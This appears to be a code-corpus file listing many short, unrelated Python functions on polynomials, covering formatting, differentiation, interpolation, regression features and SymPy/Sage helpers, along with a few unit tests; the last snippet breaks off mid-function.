[ "def list_to_poly(polynomial_list):\n max_degree = len(polynomial_list) - 1\n strings = []\n opts = ['x', '']\n for index, num in enumerate(polynomial_list):\n if num == 0:\n continue\n if index < max_degree - 1:\n string = '{}x^{}'.format(num, max_degree - index)\n strings.append(string)\n else:\n strings.append(str(num) + opts[index - (max_degree - 1)])\n polynomial = ' + '.join(strings).replace('+ -', '- ')\n return polynomial", "def polynomial_equation(funct):\n coeff = str(differentiation.parse_coefficient(funct))\n if \"^\" not in funct:\n divisor = \"1\"\n else:\n divisor_location = str(funct.index(\"^\") + 1)\n divisor = funct[divisor_location:]\n if divisor == \"-1\":\n pass\n else:\n divisor = str(int(divisor) + 1)\n coeff += \"/\" + divisor\n return coeff + \"x^\" + str(divisor)", "def compute_deriv(poly):\n derivative_of_poly = []\n for i in range(1, len(poly)):\n power = i\n coeff = poly[i]\n y = float(coeff * power)\n first = derivative_of_poly.append(y)\n return derivative_of_poly", "def build_poly(x, degree):\n \"\"\"\n Assemble the 3 label vectors with the original ordering \n Inputs:\n - x (ndarray) : binary prediction for set 1\n - degree (int) : binary prediction for set 2 \n Outputs: \n - p (ndarray) : predicted labels for test set ( with the original ordering)\n \"\"\"\n # forming a matrix containing the data points\n terms = np.hstack([np.ones([x.shape[0],1]),np.tile(x,(1,degree))])\n index = np.arange(degree)+1\n \n # forming a matrix contnaining the exponents\n exponents = np.multiply(np.ones((1, x.shape[1])), index[:, np.newaxis])\n exponents = exponents.reshape([1, x.shape[1]*degree])\n exponents = np.multiply(exponents, np.ones([x.shape[0], 1]))\n exponents = np.hstack([np.ones( (x.shape[0], 1) ),exponents])\n \n # using the exponent matrix as the element-wise exponents of the terms in the terms matrix\n p=np.power(terms,exponents)\n return p", "def poly_derivative(poly):\n if not poly or type(poly) is not list:\n return None\n\n response = []\n\n for order in range(1, len(poly)):\n response.append(order * poly[order])\n\n if not response:\n response.append(0)\n\n return response", "def polynomial_creator(*coefficients):\n def polynomial(x):\n res = 0\n for index, coeff in enumerate(coefficients):\n res += coeff * x** index\n return res\n return polynomial", "def compute_deriv(poly):\n exp = 1\n new_poly = []\n for x in poly[1:]:\n new_poly.append(x * exp)\n exp += 1\n\n return tuple(new_poly)", "def build_poly_expr(query_tuple):\n print(\"query_tuple: \", query_tuple)\n expression = '0 + '\n factors = np.arange(7)\n\n for coeff, factor in zip(query_tuple, factors):\n if coeff != None:\n expression += '(' + str(np.float64(coeff)) + '*x^{}) + '.format(factor)\n\n # Remove trailing '+'\n expression = expression[:-3]\n \n # Return as a tuple.\n return (expression,)", "def get_equation(self):\n self.polynomials = dict(sorted(self.polynomials.items(), reverse=True))\n string = \"\"\n\n for index, polynomial in self.polynomials.items():\n polynomial = int(polynomial)\n index = int(index)\n\n if polynomial != 0:\n if polynomial < 0:\n string_pre = \" - \"\n else:\n string_pre = \" + \"\n\n if index != 0:\n string_append = \"x\"\n elif polynomial == 1 or polynomial == -1:\n string_append = str(abs(polynomial))\n else:\n string_append = \"\"\n\n if polynomial < 0:\n polynomial = abs(polynomial)\n\n if polynomial != 1:\n string_append = str(polynomial) + string_append\n\n if index != 0 and index != 1:\n string_append += \"^\" + str(index)\n\n string += string_pre + 
string_append\n\n if len(string) > 0:\n string = string[3:]\n else:\n string = \"0\"\n\n return string", "def coefficients_from_Weierstrass_polynomial(f):\n R = f.parent()\n cubic_variables = [x for x in R.gens() if f.degree(x) == 3]\n quadratic_variables = [y for y in R.gens() if f.degree(y) == 2]\n try:\n x = cubic_variables[0]\n y = quadratic_variables[0]\n except IndexError:\n raise ValueError('polynomial is not in long Weierstrass form')\n\n a1 = a2 = a3 = a4 = a6 = 0\n x3 = y2 = None\n for coeff, mon in f:\n if mon == x**3:\n x3 = coeff\n elif mon == x**2:\n a2 = coeff\n elif mon == x:\n a4 = coeff\n elif mon == 1:\n a6 = coeff\n elif mon == y**2:\n y2 = -coeff\n elif mon == x*y:\n a1 = -coeff\n elif mon == y:\n a3 = -coeff\n else:\n raise ValueError('polynomial is not in long Weierstrass form')\n\n if x3 != y2:\n raise ValueError('the coefficient of x^3 and -y^2 must be the same')\n elif x3 != 1:\n a1, a2, a3, a4, a6 = a1/x3, a2/x3, a3/x3, a4/x3, a6/x3\n return [a1, a2, a3, a4, a6]", "def test():\n assert str(Polynomial(0, 1, 0, -1, 4, -2, 0, 1, 3, 0)) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x\"\n assert str(Polynomial([-5, 1, 0, -1, 4, -2, 0, 1, 3, 0])) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x - 5\"\n assert str(Polynomial(x7=1, x4=4, x8=3, x9=0, x0=0, x5=-2, x3=-1, x1=1)) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x\"\n assert str(Polynomial(x2=0)) == \"0\"\n assert str(Polynomial(x0=0)) == \"0\"\n assert Polynomial(x0=2, x1=0, x3=0, x2=3) == Polynomial(2, 0, 3)\n assert Polynomial(x2=0) == Polynomial(x0=0)\n assert str(Polynomial(x0=1) + Polynomial(x1=1)) == \"x + 1\"\n assert str(Polynomial([-1, 1, 1, 0]) + Polynomial(1, -1, 1)) == \"2x^2\"\n pol1 = Polynomial(x2=3, x0=1)\n pol2 = Polynomial(x1=1, x3=0)\n assert str(pol1 + pol2) == \"3x^2 + x + 1\"\n assert str(pol1 + pol2) == \"3x^2 + x + 1\"\n assert str(Polynomial(x0=-1, x1=1) ** 1) == \"x - 1\"\n assert str(Polynomial(x0=-1, x1=1) ** 2) == \"x^2 - 2x + 1\"\n pol3 = Polynomial(x0=-1, x1=1)\n assert str(pol3 ** 4) == \"x^4 - 4x^3 + 6x^2 - 4x + 1\"\n assert str(pol3 ** 4) == \"x^4 - 4x^3 + 6x^2 - 4x + 1\"\n assert str(Polynomial(x0=2).derivative()) == \"0\"\n assert str(Polynomial(x3=2, x1=3, x0=2).derivative()) == \"6x^2 + 3\"\n assert str(Polynomial(x3=2, x1=3, x0=2).derivative().derivative()) == \"12x\"\n pol4 = Polynomial(x3=2, x1=3, x0=2)\n assert str(pol4.derivative()) == \"6x^2 + 3\"\n assert str(pol4.derivative()) == \"6x^2 + 3\"\n assert Polynomial(-2, 3, 4, -5).at_value(0) == -2\n assert Polynomial(x2=3, x0=-1, x1=-2).at_value(3) == 20\n assert Polynomial(x2=3, x0=-1, x1=-2).at_value(3, 5) == 44\n pol5 = Polynomial([1, 0, -2])\n assert pol5.at_value(-2.4) == -10.52\n assert pol5.at_value(-2.4) == -10.52\n assert pol5.at_value(-1, 3.6) == -23.92\n assert pol5.at_value(-1, 3.6) == -23.92", "def poly_derivative(poly):\n if type(poly) is not list or len(poly) < 1:\n return None\n if len(poly) == 1:\n return [0]\n\n derivated_coefficients = []\n\n for power, coefficient in enumerate(poly):\n if power == 0:\n pass\n\n else:\n new_coefficient = coefficient * power\n derivated_coefficients.append(new_coefficient)\n\n return(derivated_coefficients)", "def _poly_func(x, a, b, c, d, e):\n return a * x ** 6 + b * x ** 5 + c * x ** 4 + d * x ** 3 + e * x ** 2", "def construct_poly(data, power):\n return np.power(data, power)", "def fourth_poly(a, b, c, d, e):\n return lambda z: a*z**4 + b*z**3 + c*z**2 + d*z + e", "def build_poly(x, degree):\n phi = np.ones(len(x))\n phi = np.vstack((phi, [x**(j+1) for j in range(degree)]))\n \n return 
phi.T", "def linear_simplify_poly(poly):\n if len(poly) < 4:\n return poly\n\n q = Queue()\n for v in poly:\n q.put(v)\n\n new_poly = []\n a = q.get()\n b = q.get()\n while True:\n if q.empty():\n new_poly += [a,b]\n break\n c = q.get()\n e1 = (b-a).normalized()\n e2 = (c-b).normalized()\n if abs(1.0 - e1.dot(e2)) < 1e-2:\n # colinear. skip b.\n a = a\n b = c\n else:\n # a,b needed.\n new_poly += [a]\n a = b\n b = c\n return new_poly", "def polyLS(pd, x, y, f, X, Y \\\n, coeff = [], xmc = [], ymc = [], ell = [], w = [], ELL = [], W = []) :\n xmc, ymc, ell, w, ELL, W = assignDefaults(x, y, xmc, ymc, ell, w, ELL, W)\n \n numP = int((pd + 1) * (pd + 2) / 2)\n \n if (len(xmc) == 1) and (len(ymc) == 1) :\n \n\n if coeff == [] :\n p = poly(x, y, pd)\n coeff = np.linalg.lstsq(p, f, rcond=None)[0]\n\n B = poly(X, Y, pd)\n approx = B.dot(coeff).flatten()\n coeff_copy = coeff\n \n else :\n \n approx = np.zeros(len(X), float)\n \n if coeff == [] :\n for i in range(len(xmc)) :\n IND = inSquare(x, y, xmc[i], ymc[i], ELL, W)\n if len(IND) < int(1.5 * numP) :\n raise ValueError(\"Not enough data for this polynomial \" \\\n + \"degree.\\nEither lower the polynomial degree or \" \\\n + \"decrease the number of subdivisions.\")\n p = poly(x[IND], y[IND], pd)\n lam = np.linalg.lstsq(p, f[IND], rcond=None)[0]\n coeff.append(lam)\n\n coeff_copy = coeff.copy()\n\n for i in range(len(xmc) - 1, -1, -1) :\n IND = inSquare(X, Y, xmc[i], ymc[i], ell, w)\n B = poly(X[IND], Y[IND], pd)\n lam = coeff.pop()\n approx[IND] = B.dot(lam).flatten()\n \n return approx, coeff_copy", "def poly_derivative(poly):\n if not type(poly) is list or len(poly) == 0 or type(poly[0]) is not int:\n return None\n\n derivative = []\n for i in range(1, len(poly)):\n derivative.append(poly[i] * i)\n\n if derivative == []:\n derivative = [0]\n\n return derivative", "def poly_desc(W, b):\n result = 'y = '\n for i, w in enumerate(W):\n result += '{:+.2f} x^{} '.format(w, len(W) - i)\n result += '{:+.2f}'.format(b[0])\n return result", "def linear_polynomial(self, e: 'PFElement') -> Polynomial:\n poly = self.polynomial(-e)\n poly += poly.monic(1)\n return poly", "def parse_poly(self, expr: str) -> Polynomial:\n return symbolic_polynomial(expr, self)", "def poly_derivative(poly):\n res = []\n if type(poly) is not list or len(poly) == 0:\n return None\n if len(poly) == 1:\n return([0])\n for i in range(1, len(poly)):\n if type(poly[i]) is not int:\n return None\n res.append(poly[i] * i)\n return(res)", "def polynomial(self, *args, indeterminate: str = 'X') -> Polynomial:\n return Polynomial([self.element(c) for c in args], base_field=self, indeterminate=indeterminate)", "def newton_divided_difference(x, y):\n\n n = x.size\n q = np.zeros((n, n - 1))\n # Insert 'y' in the first column of the matrix 'q'\n q = np.concatenate((y[:, None], q), axis=1)\n\n for i in range(1, n):\n for j in range(1, i + 1):\n q[i, j] = (q[i, j - 1] - q[i - 1, j - 1]) / (x[i] - x[i - j])\n\n # Copy the diagonal values of the matrix q to the vector f\n f = np.zeros(n)\n for i in range(0, n):\n f[i] = q[i, i]\n\n # Prints the polynomial\n print(\"The polynomial is:\")\n print(\"p(x)={:+.4f}\".format(f[0]), end=\"\")\n for i in range(1, n):\n print(\"{:+.4f}\".format(f[i]), end=\"\")\n for j in range(1, i + 1):\n print(\"(x{:+.4f})\".format(x[j] * -1), end=\"\")\n print(\"\")\n\n return [f]", "def poly_derivative(poly):\n result = []\n\n if poly is None or type(poly) != list or poly == []:\n return None\n\n for i in range(len(poly)):\n if type(poly[i]) not in (int, float):\n 
return None\n elif len(poly) == 1:\n result.append(0)\n else:\n if i == 0:\n continue\n result.append(i * poly[i])\n\n return result", "def generate_polynomial():\n degree = numpy.random.choice(range(3, 7))\n x = numpy.linspace(-10, 10, 1000)\n coefficients = numpy.random.chisquare(3, size=degree) + 1\n coefficients *= numpy.random.choice([-1, 1], size=coefficients.shape)\n coefficients *= 0.5\n y = numpy.polyval(coefficients, x)\n add_noise(y, 0.1)\n return x, y", "def zzX_to_poly(f, *symbols):\n from sympy.polys import Poly\n\n terms = {}\n\n for monom, coeff in zzX_to_dict(f).iteritems():\n terms[monom] = Integer(int(coeff))\n\n return Poly(terms, *symbols)", "def poly_derivative(poly):\n if type(poly) != list:\n return None\n size = len(poly)\n if size == 0:\n return None\n for e in poly:\n if not isinstance(e, (int, float)):\n return None\n if size == 1:\n return [0]\n deriv = []\n for i in range(1, size):\n temp = poly[i] * i\n deriv.append(temp)\n return deriv", "def base_polynome(numbers):\n\n monomes = [ x**n for n in numbers ]\n polynome = sum(monomes)\n\n return poly(polynome, x)", "def _poly_desc(self, W, b):\n\t\tresult = 'y = '\n\t\tfor i, w in enumerate(W):\n\t\t\tresult += '{:+.2f} x^{} '.format(w, len(W) - i)\n\t\tresult += '{:+.2f}'.format(b[0])\n\t\treturn result", "def definePolyFunction():\n lstWeights=[]\n degree = input(\"degree of polynomial in terms of highest exponent of x:\")\n degree = int(degree+1)\n for a in range (0,degree):\n string='weight for x^'+str(a)+':'\n weight = input(string)\n weight = float(weight)\n lstWeights.append(weight)\n return lstWeights", "def poly_derivative(poly):\n if not isinstance(poly, list):\n return None\n elif len(poly) == 0:\n return None\n elif len(poly) == 1:\n return [0]\n else:\n deriv = [0] * (len(poly) - 1)\n for i in range(len(poly) - 1):\n if (not isinstance(poly[i], int)):\n return None\n deriv[i] = poly[i + 1] * (i + 1)\n return deriv", "def general_poly(L):\n def evaluate(x):\n length=len(L)-1\n value=0\n for i in L:\n value+=i*(x**length)\n length-=1\n return value\n return evaluate", "def lsf2poly(lsf):\n # Reference: A.M. 
Kondoz, \"Digital Speech: Coding for Low Bit Rate Communications\n # Systems\" John Wiley & Sons 1994 ,Chapter 4\n\n # Line spectral frequencies must be real.\n\n lsf = np.array(lsf)\n\n if max(lsf) > np.pi or min(lsf) < 0:\n raise ValueError('Line spectral frequencies must be between 0 and pi.')\n\n p = len(lsf) # model order\n\n # Form zeros using the LSFs and unit amplitudes\n z = np.exp(1.j * lsf)\n\n # Separate the zeros to those belonging to P and Q\n rQ = z[0::2]\n rP = z[1::2]\n\n # Include the conjugates as well\n rQ = np.concatenate((rQ, rQ.conjugate()))\n rP = np.concatenate((rP, rP.conjugate()))\n\n # Form the polynomials P and Q, note that these should be real\n Q = np.poly(rQ);\n P = np.poly(rP);\n\n # Form the sum and difference filters by including known roots at z = 1 and\n # z = -1\n\n if p % 2:\n # Odd order: z = +1 and z = -1 are roots of the difference filter, P1(z)\n P1 = np.convolve(P, [1, 0, -1])\n Q1 = Q\n else:\n # Even order: z = -1 is a root of the sum filter, Q1(z) and z = 1 is a\n # root of the difference filter, P1(z)\n P1 = np.convolve(P, [1, -1])\n Q1 = np.convolve(Q, [1, 1])\n\n # Prediction polynomial is formed by averaging P1 and Q1\n\n a = .5 * (P1 + Q1)\n return a[0:-1:1] # do not return last element", "def poly_eq(self, independent, dependent):\n\n try:\n x = self.df_input[[independent]]\n y = self.df_input[[dependent]]\n\n poly = PolynomialFeatures(degree = 2)\n x_poly = poly.fit_transform(x) \n\n model = LinearRegression()\n model.fit(x_poly, y)\n coef_arr = model.coef_\n intercept_arr = model.intercept_\n \n poly_equation = \"y = \" + str(round(coef_arr[0][2], 4)) + \"x\\xB2\"\n \n if(coef_arr[0][1] < 0):\n poly_equation += \" + (\" + str(round(coef_arr[0][1], 4)) + \"x\" + \")\"\n else:\n poly_equation += \" + \" + str(round(coef_arr[0][1], 4)) + \"x\"\n \n if(intercept_arr[0] < 0):\n poly_equation += \" + (\" + str(round(intercept_arr[0], 4)) + \")\"\n else:\n poly_equation += \" + \" + str(round(intercept_arr[0], 4))\n \n return poly_equation\n except Exception as e:\n print(e)", "def deriv(self):\n poly_deriv = []\n for i, val in enumerate(self.coeff):\n poly_deriv.append(i*val)\n # Removes the differentiated constant (which is always 0).\n del poly_deriv[0]\n return Poly(poly_deriv)", "def Hcurl_polynomials(\n domain_dim: int, range_dim: int, order: int, variables: AxisVariablesNotSingle = x\n) -> typing.List[VectorFunction]:\n assert domain_dim == range_dim\n if domain_dim == 2:\n return [VectorFunction((\n variables[0] ** (order - 1 - j) * variables[1] ** (j + 1),\n -variables[0] ** (order - j) * variables[1] ** j,\n )) for j in range(order)]\n if domain_dim == 3:\n poly: typing.List[VectorFunction] = []\n poly += [VectorFunction((\n variables[0] ** (m - 1) * variables[1] ** n * variables[2] ** (order - m - n + 1),\n 0, -variables[0] ** m * variables[1] ** n * variables[2] ** (order - m - n)\n )) for n in range(order) for m in range(1, order + 1 - n)]\n poly += [VectorFunction((\n 0, variables[0] ** m * variables[1] ** (n - 1) * variables[2] ** (order - m - n + 1),\n -variables[0] ** m * variables[1] ** n * variables[2] ** (order - m - n)\n )) for m in range(order) for n in range(1, order + 1 - m)]\n poly += [VectorFunction((\n variables[0] ** (order - n) * variables[1] ** n,\n -variables[0] ** (order + 1 - n) * variables[1] ** (n - 1), 0\n )) for n in range(1, order + 1)]\n return poly\n raise ValueError(f\"Unsupported dimension: {domain_dim}\")", "def build_poly(x, degree): \n # ***************************************************\n # COPY 
YOUR CODE FROM EX03 HERE\n # polynomial basis function: TODO\n # this function should return the matrix formed\n # by applying the polynomial basis to the input data\n # ***************************************************\n raise NotImplementedError", "def __str__(self) -> str:\n polynomial = \"\"\n for i in range(self.degree, -1, -1):\n if self.coefficients[i] == 0:\n continue\n elif self.coefficients[i] > 0:\n if polynomial:\n polynomial += \" + \"\n else:\n polynomial += \" - \"\n\n if i == 0:\n polynomial += str(abs(self.coefficients[i]))\n elif i == 1:\n polynomial += str(abs(self.coefficients[i])) + \"x\"\n else:\n polynomial += str(abs(self.coefficients[i])) + \"x^\" + str(i)\n\n return polynomial", "def horner(poly: Sequence[float], x: float) -> float:\n result = 0.0\n for coeff in reversed(poly):\n result = result * x + coeff\n return result", "def simplify(self): # TODO too complex, refactor\n simplified = self.__simplifyRecurse()\n # distributed out the polynomial. Now need to collect like terms\n simplified.vars = self.vars.copy()\n orderedVars = sorted(list(self.vars))\n\n powers = {} # will have keys of tuples. The tuples will represent the power of a variable. Values will be the\n for monomial in simplified.poly[1:]:\n power = [0] * len(orderedVars)\n total = 0\n\n if monomial.isSimple():\n monomial.poly = [\"*\", monomial.poly]\n\n for term in monomial.poly[1:]:\n term = ensurePoly(term)\n if isinstance(term.poly, (int, float)):\n total += term.poly\n elif isinstance(term.poly, (Variable.Variable)):\n power[orderedVars.index(term.poly)] += 1\n\n power = tuple(power)\n if power not in powers:\n powers[power] = total\n else:\n powers[power] = min(total, powers[power])\n\n finalPoly = Polynomial()\n finalPoly.poly = [\"+\"]\n finalPoly.vars = self.vars.copy()\n for power in sorted(list(powers.keys())):\n monomial = Polynomial()\n monomial.poly = [\"*\"]\n if powers[power] != 0:\n monomial.poly.append(powers[power])\n\n for pow, ind in zip(power, range(len(power))):\n if pow == 0:\n continue\n elif pow == 1:\n monomial.poly.append(orderedVars[ind])\n else:\n monomial.poly.append(orderedVars[ind]**pow)\n finalPoly.poly.append(monomial)\n return finalPoly", "def parse_polynomial(s):\n\n def parse_n(s):\n '''Parse the number part of a polynomial string term'''\n if not s:\n return 1\n elif s == '-':\n return -1\n elif s == '+':\n return 1\n return float(eval(s))\n\n def parse_p(s, powerPattern):\n '''Parse the power part of a polynomial string term'''\n if not s:\n return 0\n multipliers = powerPattern.findall(s)[0]\n if not multipliers:\n return 1\n return int(multipliers)\n s = str(s).replace(' ', '') # remove all whitespace from string\n m = re.search('[a-zA-Z]+', s)\n try:\n varLetter = m.group(0)\n except AttributeError:\n varLetter = 'P'\n termPattern = re.compile(\n '([+-]?\\d*\\.?\\d*)\\**({var}?\\^?\\d?)'.format(var=varLetter))\n powerPattern = re.compile('{var}\\^?(\\d)?'.format(var=varLetter))\n order_multipliers = {}\n\n for n, p in termPattern.findall(s):\n n, p = n.strip(), p.strip()\n if not n and not p:\n continue\n n, p = parse_n(n), parse_p(p, powerPattern)\n if p in order_multipliers:\n order_multipliers[p] += n\n else:\n order_multipliers[p] = n\n highest_order = max(\n max(order_multipliers.keys()), 1) # order must be at least linear\n multipliers = [0] * (highest_order + 1)\n for key, val in order_multipliers.items():\n multipliers[key] = val\n\n return multipliers", "def __init__(self, pol1, pol2):\n\n self._pol1, self._pol2 = pol1, pol2\n self.deg = 
self._pol1.deg*self._pol2.deg # degree of composed polynomial\n\n # WARNING: numpy.polynomial.polynomial.polyadd and polypow considers\n # arrays as polynomials with lowest coefficient first,\n # contrarily to polyval and polyfit.\n _pol1, _pol2 = self._pol1.pol[::-1], self._pol2.pol[::-1]\n\n self.pol = np.zeros((1,)) # composed polynomial\n for i in range(pol1.deg + 1):\n self.pol = polyadd(self.pol, _pol1[i]*polypow(_pol2, i))\n\n self.pol = self.pol[::-1]", "def __test_s_polynomial():\n poly_ring = PolynomialRing(QQ, 'x,y', order='deglex')\n x, y = poly_ring('x'), poly_ring('y')\n g = x ** 3 - 2 * x * y\n h = x ** 2 * y - 2 * y ** 2 + x\n print __s_polynomial(g, h) # Expected -x^2", "def polynomialInterpolation(self,s):\n #print(s)\n #s[i]=xi,s[j]=xj\n return Polynomial.createFromInterpolation(s,range(len(s)))\n #return Polynomial(s,T)", "def PolyDiff(u, x, deg = 3, diff = 1, width = 5):\n\n u = u.flatten()\n x = x.flatten()\n\n n = len(x)\n du = np.zeros((n - 2*width,diff))\n\n # Take the derivatives in the center of the domain\n for j in range(width, n-width):\n\n points = np.arange(j - width, j + width)\n\n # Fit to a polynomial\n poly = np.polynomial.chebyshev.Chebyshev.fit(x[points],u[points],deg)\n\n # Take derivatives\n for d in range(1,diff+1):\n du[j-width, d-1] = poly.deriv(m=d)(x[j])\n\n return du", "def poly_regression(self,precision=8):\n # return empty lists if input is empty\n if self.training == []:\n return [],[]\n\n latitudes = []\n longitudes = []\n for point in self.training[:-1]:\n latitudes.append(point[0])\n longitudes.append(point[1]) \n # store everything in a dataframe\n latDf = pd.DataFrame(numpy.array(latitudes), columns=['latitudes'])\n longDf = pd.DataFrame(numpy.array(longitudes), columns=['longitudes'])\n\n # learn how to do regression\n reg = linear_model.LinearRegression()\n\n # pass the order of your polynomial here \n poly = PolynomialFeatures(precision)\n\n \n # regression with latitude as domain\n vertical_predicted_path = []\n transform = poly.fit_transform(longDf)\n\n reg.fit(transform,latDf)\n predictions = reg.predict(transform)\n\n for i in range(len(predictions)):\n vertical_predicted_path.append([predictions[i][0],longDf[\"longitudes\"][i]])\n\n \n # regression with longitude domain\n horizontal_predicted_path = []\n transform = poly.fit_transform(latDf)\n\n reg.fit(transform,longDf)\n predictions = reg.predict(transform)\n\n for i in range(len(predictions)):\n horizontal_predicted_path.append([latDf[\"latitudes\"][i], predictions[i][0]])\n\n self.horizontal = sorted(horizontal_predicted_path, key=lambda k: [k[1], k[0]])\n self.vertical = sorted(vertical_predicted_path, key=lambda k: [k[0], k[1]])\n \n # return sorted horizontal and vertical prediction\n return self.horizontal, self.vertical", "def general_poly (L):\n def to_apply (x):\n n = 0\n for i in L:\n n = x*n + i\n return n\n return to_apply", "def test_polynomial_from_float_list_same_as_from_float_args(self):\n coeffs = [1.0, 2.0, 3.0, 4.0, 5.0]\n\n p1 = Polynomial(coeffs)\n p2 = Polynomial(*coeffs)\n\n self.assertEqual(p1, p2)", "def poly(x, y, pd) :\n # Maximum polynomial degree allowed is 7.\n maxD = 7\n if pd > maxD :\n exit(\"Please choose a reasonable polynomial degree (0 <= pd <= \" + maxD + \").\")\n \n # Make the polynomial matrix one degree at a time.\n p = np.zeros((len(x), int((pd+1)*(pd+2)/2)), float)\n count = 0\n numP = 0\n for i in range(pd + 1) :\n for j in range(numP + 1) :\n if (j == 0) and (numP == 0) :\n p[:,count] = 1\n elif (j == 0) :\n p[:,count] = 
x**(numP-j)\n elif (numP-j == 0) :\n p[:,count] = y**j\n else :\n p[:,count] = x**(numP-j) * y**j\n count += 1\n numP += 1\n \n return p", "def build_poly(tx, degree) :\n shape = tx.shape\n poly = np.zeros((shape[0], shape[1] * degree))\n poly[:,:shape[1]] = tx\n for deg in range(2, degree + 1) :\n for j in range(0, shape[1]) :\n poly[:, shape[1] * (deg - 1) + j] = tx[:,j] ** deg\n return poly", "def zzx_to_poly(f, *symbols):\n from sympy.polys import Poly\n\n terms = {}\n\n for monom, coeff in zzx_to_dict(f).iteritems():\n terms[(monom,)] = Integer(int(coeff))\n\n return Poly(terms, *symbols)", "def poly_derivative(poly):\n try:\n iter(poly)\n except TypeError:\n return None\n if poly == [] or any(not isinstance(expo, (int, float)) for expo in poly):\n return None\n if len(poly) == 1:\n return [0]\n return [i*expo for i, expo in enumerate(poly)][1:]", "def preprocess_roots(poly):\n coeff = S.One\n\n poly_func = poly.func\n try:\n _, poly = poly.clear_denoms(convert=True)\n except DomainError:\n return coeff, poly\n\n poly = poly.primitive()[1]\n poly = poly.retract()\n\n # TODO: This is fragile. Figure out how to make this independent of construct_domain().\n if poly.get_domain().is_Poly and all(c.is_term for c in poly.rep.coeffs()):\n poly = poly.inject()\n\n strips = list(zip(*poly.monoms()))\n gens = list(poly.gens[1:])\n\n base, strips = strips[0], strips[1:]\n\n for gen, strip in zip(list(gens), strips):\n reverse = False\n\n if strip[0] < strip[-1]:\n strip = reversed(strip)\n reverse = True\n\n ratio = None\n\n for a, b in zip(base, strip):\n if not a and not b:\n continue\n elif not a or not b:\n break\n elif b % a != 0:\n break\n else:\n _ratio = b // a\n\n if ratio is None:\n ratio = _ratio\n elif ratio != _ratio:\n break\n else:\n if reverse:\n ratio = -ratio\n\n poly = poly.eval(gen, 1)\n coeff *= gen**(-ratio)\n gens.remove(gen)\n\n if gens:\n poly = poly.eject(*gens)\n\n if poly.is_univariate and poly.get_domain().is_ZZ:\n basis = _integer_basis(poly)\n\n if basis is not None:\n n = poly.degree()\n\n def func(k, coeff):\n return coeff//basis**(n - k[0])\n\n poly = poly.termwise(func)\n coeff *= basis\n\n if not isinstance(poly, poly_func):\n poly = poly_func(poly)\n return coeff, poly", "def test_polynomial_from_complex_list_same_as_from_complex_args(self):\n coeffs = [1j, 2j, 3j, 4j, 5j]\n\n p1 = Polynomial(coeffs)\n p2 = Polynomial(*coeffs)\n\n self.assertEqual(p1, p2)", "def gen_rand_poly(deg_lower_limit = 1, deg_upper_limit = 10, coeff_limit = 10):\n deg = random.randint(deg_lower_limit,deg_upper_limit)\n coeffs = [random.randint(-coeff_limit, coeff_limit) for _ in range(deg+1)]\n\n # Never have 0 as leading coefficient\n if coeffs[deg] == 0:\n coeffs[deg] = 1\n\n def term(coeff, d):\n if coeff == 0:\n return ''\n elif d == 0:\n return (' + ' if coeff>0 else ' - ') + str(abs(coeff))\n elif d == 1:\n return (' + ' if coeff>0 else ' - ') + (f'{abs(coeff)}x' if abs(coeff)!=1 else 'x')\n elif d == deg:\n return ('' if coeff>0 else '-') + (f'{abs(coeff)}x^{d}' if abs(coeff)!=1 else f'x^{d}')\n else:\n return (' + ' if coeff>0 else ' - ') + (f'{abs(coeff)}x^{d}' if abs(coeff)!=1 else f'x^{d}')\n\n terms = [term(coeffs[d], d) for d in range(deg+1)]\n return deg, coeffs, ''.join([terms[d]for d in range(deg,-1,-1)]).strip('+ ')", "def derivative(self) -> Polynomial:\n coefficients: list[float] = [0] * self.degree\n for i in range(self.degree):\n coefficients[i] = self.coefficients[i + 1] * (i + 1)\n return Polynomial(self.degree - 1, coefficients)", "def coeffients(x, y):\n\n # 
ensure floating point datatypes\n x.astype(float)\n y.astype(float)\n\n # degree of interpolating polynomial\n n = len(x)\n\n # intitilize list of coeffients for interpolating polynomial to y values\n c = y.tolist()\n\n # compute coeffients\n for j in range(1, n):\n for i in range(n-1, j-1, -1):\n c[i] = float(c[i]-c[i-1])/float(x[i]-x[i-j])\n\n # return an array of polynomial coefficient, note: reverse order for np.polyval function\n return np.array(c[::-1])", "def tensdot(polyList,order,trunc):\n\n def reshape(poly,expo):\n\n poly.coef = poly[:][:,expo]\n poly.expo = expo\n return poly\n\n dim = len(polyList)\n expo = indextens(order,dim,trunc)\n nbrPoly = expo.shape[1]\n coef = np.eye(nbrPoly)\n\n # Tensor product of the univariate basis\n\n for i in range(dim): polyList[i] = reshape(polyList[i],expo[i])\n for i in range(nbrPoly): coef[i] = np.prod([polyList[j][expo[j,i]] for j in range(dim)],axis=0)\n\n poly = Polynomial(expo,coef,1)\n return poly", "def polygen(count=10, sum_count=10, deg=5, cof=10):\n\n s = enumi_beg\n ans = enumi_beg\n\n for i in range(count):\n s += item_beg\n ans += item_beg\n p = genpoly(sum_count, deg, cof)\n ans += p.print_out()\n s += p.rep + item_end\n ans += item_end\n s += enumi_end\n ans += enumi_end\n return s, ans", "def general_poly (L):\n def inside(x):\n result = 0\n pwr = len(L) - 1\n for l in L:\n result = result + l * x ** pwr\n pwr -= 1\n return result\n return inside", "def _eval_legpoly(self, t_0, t_s, p_0, p_s, geometry=None):\n\n assert geometry is not None, \"Geometry needs to be specified!\"\n\n theta_0 = sp.Symbol(\"theta_0\")\n theta_s = sp.Symbol(\"theta_s\")\n theta_ex = sp.Symbol(\"theta_ex\")\n phi_0 = sp.Symbol(\"phi_0\")\n phi_s = sp.Symbol(\"phi_s\")\n phi_ex = sp.Symbol(\"phi_ex\")\n\n res = self.legexpansion(t_0, t_s, p_0, p_s, geometry).xreplace(\n {\n theta_0: t_0,\n theta_s: t_s,\n phi_0: p_0,\n phi_s: p_s,\n theta_ex: t_s,\n phi_ex: p_s,\n }\n )\n return res.evalf()", "def derivative(polinom):\n l = []\n for i in range(1, polinom.degree+1):\n l.append(polinom.coefficients[i]*i)\n return Polinom(l)", "def construct_polynomial_approx(degree, weights):\n # here is a function that is created on the fly from the input feature\n # mapping and weights\n def prediction_function(xs):\n expanded_xs = np.matrix(expand_to_monomials(xs, degree))\n ys = expanded_xs*np.matrix(weights).reshape((len(weights),1))\n return np.array(ys).flatten()\n # we return the function reference (handle) itself. 
